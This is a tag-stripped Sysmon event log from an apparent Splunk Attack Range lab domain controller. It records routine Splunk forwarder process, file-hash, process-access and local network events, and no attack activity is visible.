AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61907-false10.0.1.12-8000- 23542300x800000000000000034840Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:45.642{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3618DC623204B2AB6885B61032525199,SHA256=CF2DB9E862ABAC60AB0E99AFB25346B99E0894BEB38CDB073BA203BB074590A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034839Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:45.641{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55FB8154DAFEF7313CFDD6EDF7A823C1,SHA256=1F85E2ED743285B2E0155B9B4EC22D396C9CB1CCA665616DF11F7CE3D49B7031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034838Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:45.641{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B633E08D3153199A8487DDA3BAE551EF,SHA256=DD0C86619CF936839B75D92CD3CBF929381F4DBA44D950AE138B0D97D6EE203B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034842Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:46.796{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27F069072F1EDCB57E1BDD210847DAC0,SHA256=F4E21DD0E74226B6320BBD957D6823848C29382A4AB9DD1AA49DB6DF7F439BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034843Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:47.968{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB125E537EE48C8F4BF30E2E752DB64,SHA256=275A8173FA5C0BF4E18BAD7BFED2DE0C4930CDC5F7D9B11E6C3A3A57192B5B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034844Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:48.551{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0F4C949ECC24945A19FE7E6BFE653AAA,SHA256=F830D26F8032CFD01D91B3D021F126E026CC0B439C9C8FD59F1C8804A083BD05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034845Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:49.117{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113F4CF7B89D6A964849B0EFC4CB6D79,SHA256=A9C4AB15992B0F504C1071EE78CB0FDFA89371014E81A3D7F05730012738D1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034846Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:50.274{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A89428BB20E562590BA7FBDEC864A41,SHA256=C3B720CB32C9FB2AF9B076D9C551678A888B58889CD9D4D24EA9C7A295DAE9EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034859Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:48.247{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61908-false10.0.1.12-8000- 10341000x800000000000000034858Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.577{CB3070D7-8E6B-6042-E407-00000000AD01}6968292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000034857Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20DB5D8FE9DE496D7885EE123EE0391C,SHA256=20BA9560026CF6D18BD2A00680757459CEA9B88AC3B07BD05F20D820AE2489BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034856Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157A3CD13273FF605AA768877A01A214,SHA256=7E649EEA57C2E97CF7E15BC63AB6B0564165F969BF2FD188237C6BE8A01E5236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034855Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3618DC623204B2AB6885B61032525199,SHA256=CF2DB9E862ABAC60AB0E99AFB25346B99E0894BEB38CDB073BA203BB074590A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034854Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6B-6042-E407-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034853Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034852Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034851Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034850Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034849Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7996-6042-0500-00000000AD01}412528C:\Windows\system32\csrss.exe{CB3070D7-8E6B-6042-E407-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034848Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.439{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6B-6042-E407-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034847Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:51.440{CB3070D7-8E6B-6042-E407-00000000AD01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000034880Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.743{CB3070D7-8E6C-6042-E607-00000000AD01}38442116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000034879Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D717978C237897C1A5EB3C5FC7766B7F,SHA256=735707AAB2067A1099D0A3A36C42F030D1D4A0893D12C47C9F956200CAE92B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034878Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20DB5D8FE9DE496D7885EE123EE0391C,SHA256=20BA9560026CF6D18BD2A00680757459CEA9B88AC3B07BD05F20D820AE2489BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034877Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6C-6042-E607-00000000AD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034876Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034875Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034874Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034873Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034872Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7996-6042-0500-00000000AD01}412528C:\Windows\system32\csrss.exe{CB3070D7-8E6C-6042-E607-00000000AD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034871Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.611{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6C-6042-E607-00000000AD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034870Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.612{CB3070D7-8E6C-6042-E607-00000000AD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000034869Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.379{CB3070D7-7998-6042-0D00-00000000AD01}9126840C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2C00-00000000AD01}2184C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034868Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.160{CB3070D7-8E6C-6042-E507-00000000AD01}62245456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034867Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6C-6042-E507-00000000AD01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034866Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 